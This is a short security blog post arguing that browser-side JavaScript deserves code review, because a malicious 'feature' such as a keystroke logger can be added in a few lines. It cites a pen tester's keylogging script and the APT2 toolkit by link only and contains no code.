Code Review Required for JavaScript Too

In the course of my professional activity, I have repeatedly bumped into well-meaning individuals (developers, architects, leaders, and more) who believe that browser-hosted JavaScript is not a real security concern (anything important to protecting our systems and data happens back on servers, right?)  This can lead to a certain amount of passivity during code-promotion code reviews.

I was just looking for a current copy of the Automated Penetration Testing Toolkit (APT2), and happen to glance at one of the author’s blogs, and was presented with another reason that JavaScript code review and accompanying risk management is still a core capability.

Much of the automated web application testing that I see day to day does a great job finding bugs.  It does not, though, do such a great job identifying new features that require only a little code to implement.

Professional pen tester Adam Compton offers some keystroke logging JavaScript along with a primitive  to catch & log the output.  Adding a keystroke logging “feature” to one of your JavaScript modules could involve only a few lines of code, but could result in any number of abuse cases — and resulting in harm of varying scope & impacts.  Monitoring for “feature” additions to your JavaScript is just another reason to keep that language on your code review radar.

REFERENCES:

Automated Penetration Testing Toolkit (APT2)
https://github.com/MooseDojo/apt2

New Script/Tool: KeyLogging in JavaScript
http://blog.seedsofepiphany.com/2015/04/new-scripttool-keylogging-in-javascript.html

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: